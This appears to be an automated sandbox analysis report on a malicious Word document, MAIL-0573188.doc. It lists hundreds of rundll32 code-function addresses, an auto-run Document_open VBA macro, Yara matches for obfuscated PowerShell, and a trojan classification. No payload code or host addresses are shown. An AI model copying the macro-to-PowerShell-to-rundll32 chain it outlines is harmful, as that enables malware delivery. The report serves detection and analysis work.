Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB41F	10_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FEE78	10_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2C63	10_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F568E	10_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203895	10_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC0C6	10_2_001FC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002002C3	10_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002042DA	10_2_002042DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8736	10_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00204B41	10_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7B63	10_2_001F7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002063C1	10_2_002063C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9A37	10_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020340A	10_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4A35	10_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2A30	10_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207A0F	10_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205A61	10_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FE05A	10_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FEA4C	10_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF444	10_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020687F	10_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020A0AF	10_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1280	10_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F48BD	10_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F80BA	10_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F60B9	10_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F62A3	10_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020889D	10_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002012E2	10_2_002012E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F96CD	10_2_001F96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002026F5	10_2_002026F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1CFA	10_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002020C5	10_2_002020C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F88E5	10_2_001F88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208ADC	10_2_00208ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB112	10_2_001FB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200D33	10_2_00200D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F153C	10_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207D03	10_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FBB3A	10_2_001FBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF536	10_2_001FF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200F0C	10_2_00200F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202B16	10_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020511B	10_2_0020511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208D1C	10_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00205D1D	10_2_00205D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00207F1F	10_2_00207F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB75F	10_2_001FB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00200B68	10_2_00200B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6754	10_2_001F6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201773	10_2_00201773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209B45	10_2_00209B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F5B79	10_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8F78	10_2_001F8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FE377	10_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00202349	10_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00208F49	10_2_00208F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC769	10_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6D9F	10_2_001F6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F839D	10_2_001F839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7998	10_2_001F7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002073AC	10_2_002073AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FF98C	10_2_001FF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002061B8	10_2_002061B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00206DB9	10_2_00206DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00209586	10_2_00209586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0020878F	10_2_0020878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F17AC	10_2_001F17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F69A0	10_2_001F69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002031E2	10_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9FDC	10_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00203FE7	10_2_00203FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002067E9	10_2_002067E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002071EF	10_2_002071EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FD7EB	10_2_001FD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201BDF	10_2_00201BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB41F	11_2_002EB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E2C63	11_2_002E2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EEE78	11_2_002EEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E568E	11_2_002E568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3895	11_2_002F3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC0C6	11_2_002EC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F02C3	11_2_002F02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F42DA	11_2_002F42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E8736	11_2_002E8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E7B63	11_2_002E7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F4B41	11_2_002F4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F63C1	11_2_002F63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E9A37	11_2_002E9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E4A35	11_2_002E4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E2A30	11_2_002E2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7A0F	11_2_002F7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F340A	11_2_002F340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5A61	11_2_002F5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F687F	11_2_002F687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EEA4C	11_2_002EEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF444	11_2_002EF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE05A	11_2_002EE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FA0AF	11_2_002FA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E62A3	11_2_002E62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E48BD	11_2_002E48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E80BA	11_2_002E80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E60B9	11_2_002E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1280	11_2_002E1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F889D	11_2_002F889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E88E5	11_2_002E88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F12E2	11_2_002F12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1CFA	11_2_002E1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F26F5	11_2_002F26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E96CD	11_2_002E96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F20C5	11_2_002F20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8ADC	11_2_002F8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E153C	11_2_002E153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EBB3A	11_2_002EBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF536	11_2_002EF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0D33	11_2_002F0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0F0C	11_2_002F0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7D03	11_2_002F7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7F1F	11_2_002F7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5D1D	11_2_002F5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8D1C	11_2_002F8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F511B	11_2_002F511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2B16	11_2_002F2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB112	11_2_002EB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC769	11_2_002EC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0B68	11_2_002F0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E8F78	11_2_002E8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E5B79	11_2_002E5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE377	11_2_002EE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1773	11_2_002F1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2349	11_2_002F2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8F49	11_2_002F8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9B45	11_2_002F9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB75F	11_2_002EB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6754	11_2_002E6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E17AC	11_2_002E17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F73AC	11_2_002F73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E69A0	11_2_002E69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6DB9	11_2_002F6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F61B8	11_2_002F61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F878F	11_2_002F878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF98C	11_2_002EF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9586	11_2_002F9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6D9F	11_2_002E6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E839D	11_2_002E839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E7998	11_2_002E7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F71EF	11_2_002F71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002ED7EB	11_2_002ED7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F67E9	11_2_002F67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3FE7	11_2_002F3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F31E2	11_2_002F31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1BDF	11_2_002F1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E9FDC	11_2_002E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B41F	12_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212C63	12_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EE78	12_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021568E	12_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223895	12_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002202C3	12_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C0C6	12_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002242DA	12_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218736	12_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217B63	12_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00224B41	12_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002263C1	12_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212A30	12_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00214A35	12_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219A37	12_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022340A	12_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227A0F	12_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225A61	12_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022687F	12_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F444	12_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EA4C	12_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E05A	12_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002162A3	12_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022A0AF	12_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002160B9	12_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002180BA	12_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002148BD	12_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211280	12_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022889D	12_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002212E2	12_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002188E5	12_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002226F5	12_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211CFA	12_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002220C5	12_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002196CD	12_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228ADC	12_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220D33	12_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F536	12_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021BB3A	12_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021153C	12_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227D03	12_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220F0C	12_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B112	12_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222B16	12_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022511B	12_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227F1F	12_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228D1C	12_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225D1D	12_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C769	12_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220B68	12_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221773	12_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E377	12_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00215B79	12_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218F78	12_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229B45	12_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222349	12_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228F49	12_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216754	12_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B75F	12_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002169A0	12_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002117AC	12_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002273AC	12_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002261B8	12_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226DB9	12_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229586	12_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022878F	12_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F98C	12_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217998	12_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021839D	12_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216D9F	12_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002231E2	12_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223FE7	12_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021D7EB	12_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002267E9	12_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002271EF	12_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221BDF	12_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219FDC	12_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FB41F	13_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00205A61	13_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2C63	13_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F60B9	13_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002002C3	13_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1CFA	13_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F153C	13_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207D03	13_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F8736	13_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202B16	13_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00208D1C	13_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00204B41	13_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F5B79	13_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE377	13_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202349	13_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC769	13_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002031E2	13_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9FDC	13_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9A37	13_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020340A	13_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F4A35	13_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2A30	13_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207A0F	13_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE05A	13_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEA4C	13_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FF444	13_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020687F	13_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEE78	13_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020A0AF	13_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F568E	13_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1280	13_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F48BD	13_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F80BA	13_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00203895	13_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F62A3	13_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020889D	13_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002012E2	13_2_002012E2

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: MAIL-0573188.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: MAIL-0573188.doc

OLE indicator, VBA macros: true

Yara signature match

Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@22/8@6/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F1C88 CreateToolhelp32Snapshot,

13_2_001F1C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$IL-0573188.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmp

Jump to behavior

Source: MAIL-0573188.doc

OLE indicator, Word Document stream: true

Source: MAIL-0573188.doc	OLE document summary: title field not present or empty
Source: MAIL-0573188.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......(.Q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....xg......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j....................................}..v............0...............................$...............	Jump to behavior
